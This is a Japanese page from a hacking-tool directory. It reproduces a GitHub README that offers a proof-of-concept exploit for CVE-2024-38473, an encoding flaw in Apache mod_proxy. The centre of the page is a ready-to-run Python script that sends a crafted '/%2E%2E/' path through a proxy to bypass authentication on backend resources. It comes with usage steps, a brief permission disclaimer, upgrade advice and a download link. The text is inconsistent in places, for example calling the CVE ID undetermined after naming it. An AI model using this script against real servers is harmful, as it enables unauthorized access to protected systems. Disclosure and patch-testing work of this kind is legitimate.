Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-38473 — Apache HTTP Server mod\_proxy のエンコーディング脆弱性(CVE-2024-38473)を実証する概念実証スクリプトであり、細工されたリクエストURLを介してバックエンドサービスへの認証バイパスを可能にします。 | Kitploit
ツール/GitHubGitHub/abdurahmon3236/cve-2024-38473
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubabdurahmon3236/cve-2024-38473

CVE-2024-38473

Apache HTTP Server mod\_proxy のエンコーディング脆弱性(CVE-2024-38473)を実証する概念実証スクリプトであり、細工されたリクエストURLを介してバックエンドサービスへの認証バイパスを可能にします。

リポジトリを見る
322年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Apache HTTP Server の mod_proxy におけるエンコーディング問題の概念実証 (PoC)

このリポジトリには、Apache HTTP Server バージョン 2.4.59 以前の mod_proxy モジュールにおけるエンコーディング問題を実証するための概念実証 (PoC) スクリプトが含まれています。この脆弱性により、不正なエンコーディングを含むリクエスト URL がバックエンドサービスに送信され、巧妙に細工されたリクエストによって認証がバイパスされる可能性があります。

目次

  • 脆弱性の説明
  • セットアップと使用方法
  • 重要な注意事項
  • 緩和策

脆弱性の説明

CVE-ID: (未定)

概要: Apache HTTP Server バージョン 2.4.59 以前の mod_proxy モジュールにおけるエンコーディング問題により、不正なエンコーディングを含むリクエスト URL がバックエンドサービスに送信される可能性があります。これにより、巧妙に細工されたリクエストを介して認証メカニズムがバイパスされる可能性があります。ユーザーは、この問題を修正したバージョン 2.4.60 にアップグレードすることを推奨します。

影響を受けるバージョン:

  • Apache HTTP Server 2.4.59 以前

修正されたバージョン:

  • Apache HTTP Server 2.4.60

セットアップと使用方法

前提条件

  • Python 3.x
  • requests ライブラリ (pip install requests)

脆弱性の実証

  1. バックエンドサービスの特定:

    • バックエンドサービスが http://backend-service.example.com にあると仮定します。
  2. 悪意のあるリクエストの作成:

    • 悪意のあるリクエストは、不正なエンコーディングを使用して認証をバイパスします。
  3. PoC スクリプトの実行:

    • 次のスクリプトを mod_proxy_poc.py として保存し、実行します。

PoC スクリプト

以下は、脆弱性を実証する Python スクリプトです。

root@kitploit:~
import requests

# Configuration
proxy_url = "http://proxy-server.example.com"  # Change this to the proxy server's URL
backend_service_path = "/protected/resource"  # The path to the protected resource on the backend service
malicious_path = "/%2E%2E/protected/resource"  # Incorrectly encoded path to bypass authentication

# Malicious request to be sent via the proxy server
malicious_url = f"{proxy_url}{malicious_path}"

def send_malicious_request():
    try:
        # Send the crafted request to the proxy server
        response = requests.get(malicious_url)
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Headers:", response.headers)
        print("Response Body:", response.text)
        
        if response.status_code == 200:
            print("[+] Successfully bypassed authentication and accessed the protected resource.")
        else:
            print("[-] Failed to bypass authentication.")
    except Exception as e:
        print("[-] An error occurred:", str(e))

if __name__ == "__main__":
    send_malicious_request()

説明

  1. 設定:

    • proxy_url: プロキシサーバーのURL。
    • backend_service_path: バックエンドサービス上の保護されたリソースへのパス。
    • malicious_path: 認証をバイパスするための不正にエンコードされたパス。
  2. send_malicious_request:

    • 不正にエンコードされたパスを含む悪意のあるURLを構築します。
    • 悪意のあるURLを使用してプロキシサーバーにGETリクエストを送信します。
    • 応答の詳細を出力し、認証がバイパスされたかどうかを確認します。

重要な注意事項

  • 権限: 対象システムでこの脆弱性をテストするには、明示的な許可を得てください。無許可のアクセスは違法かつ非倫理的です。
  • テスト環境: 本番システムに影響を与えないよう、管理された環境でテストを実施してください。

緩和策

この脆弱性を緩和するには、mod_proxy モジュールのエンコーディング問題を修正した Apache HTTP Server バージョン 2.4.60 にアップグレードしてください。

  • アップグレード手順:
    • 公式の Apache HTTP Server ドキュメント に従って、最新バージョンをダウンロードしてインストールしてください。

ソフトウェアを最新の状態に保ち、セキュリティのベストプラクティスに従うことで、mod_proxy モジュールにおけるこのエンコーディング問題のような脆弱性を防ぐことができます。

ツールをダウンロード